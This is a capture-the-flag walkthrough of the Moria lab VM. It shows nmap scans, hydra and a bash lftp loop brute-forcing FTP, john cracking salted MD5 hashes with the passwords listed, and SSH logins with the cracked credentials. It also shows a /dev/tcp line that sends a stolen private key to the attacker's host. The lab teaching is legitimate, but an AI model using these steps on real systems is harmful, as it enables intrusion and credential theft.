Moria CTF Walkthrough - DigiP

a guest
Apr 21st, 2017
netdiscover
192.168.1.251 08:00:27:9a:4f:a4 6 360 PCS Systemtechnik GmbH


nmap -sC -sV -T5 -v -p- --open --script vuln 192.168.1.251
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_sslv2-drown:
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /w/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
MAC Address: 08:00:27:9A:4F:A4 (Oracle VirtualBox virtual NIC)

view-source:http://192.168.1.251/w/h/i/s/p/e/r/the_abyss/

Telchar to Thrain:"That human is slow, don't give up yet"

Refreshing the page, the messages change:
"Eru! Save us!"
"Is this the end?"
Fundin:"That human will never save us!"
"Knock knock"
Dain:"Is that human deaf? Why is it not listening?"
Ori:"Will anyone hear us?"
Balin: "Be quiet, the Balrog will hear you!"
Nain:"Will the human get the message?"
Maeglin:"The Balrog is not around, hurry!"
"We will die here.."
Oin:"Stop knocking!"


gobuster -u http://192.168.1.251/w/h/i/s/p/e/r/the_abyss -f -e -x txt,html,php,jpg,gif,png,zip,sql,lock,conf,git,md -w /usr/share/wordlists/dirb/common.txt

view-source:http://192.168.1.251/w/h/i/s/p/e/r/the_abyss/random.txt
Balin: "Be quiet, the Balrog will hear you!"
Oin:"Stop knocking!"
Ori:"Will anyone hear us?"
Fundin:"That human will never save us!"
Nain:"Will the human get the message?"
"Eru! Save us!"
"We will die here.."
"Is this the end?"
"Knock knock"
"Too loud!"
Maeglin:"The Balrog is not around, hurry!"
Telchar to Thrain:"That human is slow, don't give up yet"
Dain:"Is that human deaf? Why is it not listening?"

So index.php is reading in and echoing out the text of this file. We'll see later if that comes in handy in any way for abuse.

Manually connecting to the FTP server, the message we are greeted with is:

220 Welcome Balrog!
Name (Balrog:root): Balrog
331 Please specify the password.
Password:

We'll try the name Balrog, and then the others we found in random.txt as we go. Our password wordlist will consist of the words from the home page image, as well as our random.txt names and keywords in upper, lower, first upper, etc.

hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftp://192.168.1.251

In doing so, FTP closes and FTPS opens on port 900!

We try:
hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftps://192.168.1.251 -s 900
hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftp://192.168.1.251 -s 900 -S

and... that closed, and now FTP is open again. Need to try this a bit differently. Hydra does not seem to be waiting long enough for the responses and may be overwhelming it.

Let's try something different. lftp is a scriptable FTP client. We can work through this in similar fashion to hydra, but in a more controlled way, through a bash script.

syntax: lftp -u $user,$pass sftp://target

So, let's try.

Added to our hosts file:
192.168.1.251 Balrog


moria.sh
---------------------------
#!/bin/bash
# Try one user at a time, so as not to trigger the port knock; watch where it happens.
# [[ ... ]] and the heredoc below are bash features, so the script is run with bash.
while IFS='' read -r line || [[ -n "$line" ]]; do
    echo "$line" # echo the password we try each time and monitor the console on each attempt
    lftp -d -u Balrog,"$line" ftp://balrog:21/ << --EOF--
pwd
quit
--EOF--
done < "/root/HDD2/ctf/moria/random"
---------------------------

We have to edit /etc/lftp.conf and add the following at the end of the file:

#set timeout
set net:timeout 2
set net:max-retries 2
set net:reconnect-interval-base 5

We'll run this like so:
bash moria.sh > moria.log

This will try connecting with the name we give in the -u first argument, with the password from each line of the random wordlist file. If Balrog doesn't work, then we edit the script and try the next name from random.txt, and so on. This seems not to trigger the port close and the open on 900.

Now, the reason I redirected output to moria.log is because much of this is going to scroll by and off screen. Looking through it in terminal scroll-back is a PITA, and we could potentially miss our login deets if not paying attention. moria.log will show the password we passed and the output for pwd, if it is successful. The password would be the word on the line directly above the pwd command output.

If you see this not working and it trips over to port 900 and closes FTP, shorten your wordlist, wait for FTP to open again, rinse, repeat. This will not be a quick process with a long wordlist, so keep it simple (stupid). There are probably better ways of doing this, but hydra does not seem to be working for me at the moment and keeps triggering port 900 open and 21 closed, even when I specify individual logins. Also, SSH with hydra closes the port almost immediately, so we'll have to be careful how we try our logins.

Output on the terminal will look similar to:
220 Welcome Balrog!
---> FEAT
<--- 211-Features:
<--- EPRT
<--- EPSV
<--- MDTM
<--- PASV
<--- REST STREAM
<--- SIZE
<--- TVFS
<--- UTF8
<--- 211 End
---> AUTH TLS
<--- 530 Please login with USER and PASS.
---> OPTS UTF8 ON
<--- 200 Always in UTF8 mode.
---> USER Balrog

where our log that helps us find the password is:

Balin
Oin
Ori
mellon
Mellon
ftp://Balrog:Mellon@192.168.1.251:21/%2Fprison
Balrog

We see our password worked for "Mellon".

:)

So the deets are "Balrog" and "Mellon".

However, /prison does not look promising...

Trying this for SSH, we realize this isn't going to work here either:
ssh Balrog@192.168.1.251
Balrog@192.168.1.251's password:
Last failed login: Fri Apr 21 07:54:13 EDT 2017 from 192.168.1.66 on ssh:notty
There were 2 failed login attempts since the last successful login.
Last login: Sun Mar 12 22:39:59 2017

WRONG GATE!

Connection to 192.168.1.251 closed.
root@kali:/mnt/HDD2/ctf/moria#

sftp Balrog@192.168.1.251 900
Balrog@192.168.1.251's password:
Received message too long 173494863


So, back to Moria over FTP.

ftp Balrog
user: Balrog
pass: Mellon

pwd
/prison

We can't list or put any files up: denied.
It keeps asking for PASV mode. We enter:
quote pasv
and now we can list files.

cd /var/www/html
ls
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 23 Mar 12 20:38 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r-------- 1 48 48 85 Mar 12 19:55 index.php
-r-------- 1 48 48 161595 Mar 11 23:12 moria.jpg
drwxr-xr-x 3 0 0 15 Mar 12 04:50 w
226 Directory send OK.

We navigate to http://192.168.1.251/QlVraKW4fbIkXau9zkAPNGzviT3UKntl/ and it gets us:
Prisoner's name Passkey
Balin c2d8960157fc8540f6d5d66594e165e0
Oin 727a279d913fba677c490102b135e51e
Ori 8c3c3152a5c64ffb683d78efc3520114
Maeglin 6ba94d6322f53f30aca4f34960203703
Fundin c789ec9fae1cd07adfc02930a39486a1
Nain fec21f5c7dcf8e5e54537cfda92df5fe
Dain 6a113db1fd25c5501ec3a5936d817c29
Thrain 7db5040c351237e8332bfbba757a1019
Telchar dd272382909a4f51163c77da6356cc6f

Also, viewing the source we find:
<!--

6MAp84
bQkChe
HnqeN4
e5ad5s
g9Wxv7
HCCsxP
cC5nTr
h8spZR
tb9AWe

MD5(MD5(Password).Salt)

-->
We can try and build a hash file for john like so:

Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe

john --list=subformats

We want: MD5(MD5(Password).Salt)
UserFormat = dynamic_2006 type = dynamic_2006: md5(md5($p).$s) (PW > 55 bytes)

john hashes --format=dynamic_2006 --fork=25 -w=/usr/share/wordlists/rockyou.txt

darkness (Thrain)
magic (Telchar)
abcdef (Dain)
hunter2 (Fundin)
spanky (Ori)
warrior (Nain)
rainbow (Oin)
flower (Balin)
fuckoff (Maeglin)

Nice and quick!!
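As an added check, not part of the walkthrough, this Python snippet reproduces john's dynamic_2006 reading of MD5(MD5(Password).Salt) and tests the cracked words against the table; the names, hashes, salts and passwords are copied from the page. The scheme falls to a wordlist this quickly because MD5 is cheap and the salt only enters after the unsalted inner digest; a slow, per-user salted KDF (bcrypt, scrypt, Argon2) is the fix.

```python
"""Check the walkthrough's cracked passwords against its MD5(MD5(Password).Salt)
hashes (added example; the names, hashes and salts are copied from the page)."""
import hashlib

# user:hash$salt lines, exactly as built for john above
HASH_FILE = """\
Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe
"""

# what john reported for each prisoner
CRACKED = {"Thrain": "darkness", "Telchar": "magic", "Dain": "abcdef",
           "Fundin": "hunter2", "Ori": "spanky", "Nain": "warrior",
           "Oin": "rainbow", "Balin": "flower", "Maeglin": "fuckoff"}


def scheme_hash(password, salt):
    """md5(md5($p).$s) as john's dynamic_2006 reads it: the inner digest is
    hex-encoded, the salt is appended to that hex string, and the result is
    hashed again. The inner md5($p) is unsalted, so it is a plain lookup target."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()


def parse_hash_file(text):
    """Map user -> (hash, salt) from user:hash$salt lines."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rest = line.split(":", 1)
        digest, salt = rest.split("$", 1)
        entries[user] = (digest.lower(), salt)
    return entries


def verify_cracked(hash_text, cracked):
    """Return {user: True/False}: does the candidate reproduce the stored hash?"""
    entries = parse_hash_file(hash_text)
    return {user: scheme_hash(pw, entries[user][1]) == entries[user][0]
            for user, pw in cracked.items() if user in entries}


if __name__ == "__main__":
    for user, ok in verify_cracked(HASH_FILE, CRACKED).items():
        print(f"{user:8} {'OK' if ok else 'MISMATCH'}")
```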

We already know Balrog is Mellon, and that is not going to work on SSH.

We've now got some more items we can add to a password/wordlist.

FTP logins with the above don't seem to work. We can try triggering port 900 again and seeing if any of these will work.

We try:
hydra -l Balin -P random ftps://balrog -s900
hydra -l Balin -P random ftp://balrog -s900 -S

Neither work
:(

hydra -L names -P random ftps://balrog -s900
hydra -L names -P random ftp://balrog -s900 -S

We can adjust our lftp script again.

---------------------------
#!/bin/bash
# Try one user at a time, so as not to trigger the port knock; watch where it happens.
while IFS='' read -r line || [[ -n "$line" ]]; do
    echo "$line" # echo the password we try each time and monitor the console on each attempt
    lftp -d -u Balin,"$line" ftps://192.168.1.251:900/ << --EOF--
pwd
quit
--EOF--
# end of heredoc delimiter
done < "/root/HDD2/ctf/moria/random"
---------------------------


So none of these seem to work for FTP or FTPS.

Let's try SSH:

hydra -L names -P random ssh://balrog

These aren't going well with hydra. Ports keep closing, including SSH. lftp doesn't support SSH either. So, we try each user, one at a time.

--------------------------
#!/bin/bash
## balrog ssh attempts
# process substitution <( ) is a bash feature; each line feeds one cracked password to sshpass
sshpass -f <(printf '%s\n' darkness) ssh Thrain@balrog
sshpass -f <(printf '%s\n' magic) ssh Telchar@balrog
sshpass -f <(printf '%s\n' abcdef) ssh Dain@balrog
sshpass -f <(printf '%s\n' hunter2) ssh Fundin@balrog
sshpass -f <(printf '%s\n' spanky) ssh Ori@balrog
sshpass -f <(printf '%s\n' warrior) ssh Nain@balrog
sshpass -f <(printf '%s\n' rainbow) ssh Oin@balrog
sshpass -f <(printf '%s\n' flower) ssh Balin@balrog
sshpass -f <(printf '%s\n' fuckoff) ssh Maeglin@balrog
--------------------------

And with that, we get:

bash moria.sh
Permission denied, please try again.
Permission denied, please try again.
Permission denied, please try again.
Permission denied, please try again.
Last login: Sun Mar 12 22:57:09 2017
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
-bash-4.2$

Boom! Login with Ori!

Ori pts/0 2017-04-21 09:28 (192.168.1.66)
-bash-4.2$ uname -a;cat /etc/*ele*; cat /etc/issue
Linux Moria 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 7.3.1611 (Core)
Derived from Red Hat Enterprise Linux 7.3 (Source)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

CentOS Linux release 7.3.1611 (Core)
CentOS Linux release 7.3.1611 (Core)
cpe:/o:centos:centos:7
[ASCII-art banner printed from /etc/issue]

-bash-4.2$

-bash-4.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:997:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:997:995::/var/lib/chrony:/sbin/nologin
geoclue:x:996:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
colord:x:995:993:User for colord:/var/lib/colord:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
abatchy:x:1000:1003::/home/abatchy:/bin/bash
Balrog:x:1001:1001::/prison:/sbin/nologin
Ori:x:1002:1003::/home/Ori:/bin/bash


cd /home
ls
abatchy Ori
-bash-4.2$ cd abatchy/
-bash: cd: abatchy/: Permission denied
-bash-4.2$ cd Ori/
-bash-4.2$ ls -la
total 8
drwx------ 3 Ori notBalrog 55 Mar 12 22:57 .
drwxr-x---. 4 root notBalrog 32 Mar 14 00:36 ..
-rw------- 1 Ori notBalrog 1 Mar 14 00:12 .bash_history
-rw-r--r-- 1 root root 225 Mar 13 23:53 poem.txt
drwx------ 2 Ori notBalrog 57 Mar 12 22:57 .ssh
-bash-4.2$ cat .bash_history

-bash-4.2$ cat poem.txt
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by.

PS: Moria will not fall!
-bash-4.2$

We tarball the .ssh files and send them back to us for the keys.

The id_rsa file seems corrupt; let's send it by itself:
cat id_rsa >& /dev/tcp/192.168.1.66/443 0>&1

Later we find these don't work, because known_hosts indicates that the user logging into SSH does so over 127.0.0.1 from the logged-in account. This requires us to ssh while logged in as Ori. To root? Oh yeah!

-bash-4.2$ cat known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
-bash-4.2$ #hmm. 127.0.0.1 you don't say...
-bash-4.2$ ssh root@127.0.0.1
Last login: Fri Apr 21 10:32:40 2017 from 127.0.0.1
[root@Moria ~]# #winner winner chicken dinner, no password asked..
[root@Moria ~]# ls -lash
total 52K
0 dr-xr-x---. 8 root root 276 Mar 12 23:02 .
0 dr-xr-xr-x. 18 root root 258 Mar 14 00:36 ..
4.0K -rw-r--r-- 1 root root 21 Mar 12 21:44 0
4.0K -rw-------. 1 root root 1.3K Mar 9 22:41 anaconda-ks.cfg
4.0K -rw-------. 1 root root 325 Apr 21 10:33 .bash_history
4.0K -rw-r--r-- 1 root root 18 Dec 28 2013 .bash_logout
4.0K -rw-r--r-- 1 root root 176 Dec 28 2013 .bash_profile
4.0K -rw-r--r-- 1 root root 176 Dec 28 2013 .bashrc
0 drwx------. 7 root root 86 Mar 9 23:47 .cache
0 drwxr-xr-x. 10 root root 128 Mar 9 23:10 .config
4.0K -rw-r--r-- 1 root root 100 Dec 28 2013 .cshrc
0 drwxr-xr-x. 2 root root 6 Mar 9 23:10 Desktop
4.0K -rw-r--r-- 1 root root 439 Mar 13 23:57 flag.txt
4.0K -rw-r--r-- 1 root root 20 Mar 11 21:00 hosts
12K -rw-------. 1 root root 8.5K Mar 12 22:30 .ICEauthority
0 drwx------. 3 root root 19 Mar 9 23:10 .local
0 drwxr-----. 3 root root 19 Mar 11 11:35 .pki
0 drwx------ 2 root root 48 Mar 12 23:00 .ssh
4.0K -rw-r--r-- 1 root root 129 Dec 28 2013 .tcshrc
[root@Moria ~]# cat flag.txt
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.”

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy

[root@Moria ~]#


:)
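The password-less root login works because a key pair in Ori's ~/.ssh is accepted by root's authorized_keys. The following Python audit is an added example, not from the walkthrough: it lists every non-root user whose ~/.ssh/*.pub matches a key in root's authorized_keys, comparing SHA256 fingerprints the way ssh-keygen -lf prints them; the directory tree, key blobs and the from="127.0.0.1" restriction in demo() are constructed, not taken from the box.

```python
"""Audit: which non-root users hold a key that root's authorized_keys accepts?
Added example; the directory tree and key blobs built in demo() are constructed."""
import base64
import hashlib
import tempfile
from pathlib import Path

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

def fingerprint(line):
    """SHA256 fingerprint of one public-key line, as ssh-keygen -lf prints it.
    Leading authorized_keys options (from=..., command=...) are skipped."""
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok in KEY_TYPES and i + 1 < len(tokens):
            try:
                blob = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            digest = base64.b64encode(hashlib.sha256(blob).digest()).decode()
            return "SHA256:" + digest.rstrip("=")
    return None

def load_fingerprints(path):
    """Fingerprints found in a key file; a missing file yields an empty set."""
    if not path.is_file():
        return set()
    lines = (ln.strip() for ln in path.read_text().splitlines())
    return {fp for fp in map(fingerprint, lines) if fp}

def audit_root_keys(root_home, home_dir):
    """(user, file, fingerprint) for every key root trusts that also sits as a
    *.pub in some user's ~/.ssh: that user can become root with plain ssh."""
    root_fps = load_fingerprints(Path(root_home) / ".ssh" / "authorized_keys")
    findings = []
    for user_home in sorted(Path(home_dir).iterdir()):
        for pub in sorted((user_home / ".ssh").glob("*.pub")):
            for fp in sorted(load_fingerprints(pub) & root_fps):
                findings.append((user_home.name, pub.name, fp))
    return findings

def demo():
    """Constructed tree mirroring Moria: root trusts Ori's key (here limited to
    127.0.0.1) and an unrelated admin key; abatchy's key is not trusted."""
    def pubkey(name):
        blob = base64.b64encode(b"constructed-not-a-real-key-" + name.encode())
        return f"ssh-ed25519 {blob.decode()} {name}@Moria\n"
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        for user in ("Ori", "abatchy"):
            (tmp / "home" / user / ".ssh").mkdir(parents=True)
            (tmp / "home" / user / ".ssh" / "id_rsa.pub").write_text(pubkey(user))
        (tmp / "root" / ".ssh").mkdir(parents=True)
        (tmp / "root" / ".ssh" / "authorized_keys").write_text(
            'from="127.0.0.1" ' + pubkey("Ori") + pubkey("admin"))
        return audit_root_keys(tmp / "root", tmp / "home")
```

On a real host, run audit_root_keys("/root", "/home") as root; any finding means a user's local key, not the root password, is the real gate to root.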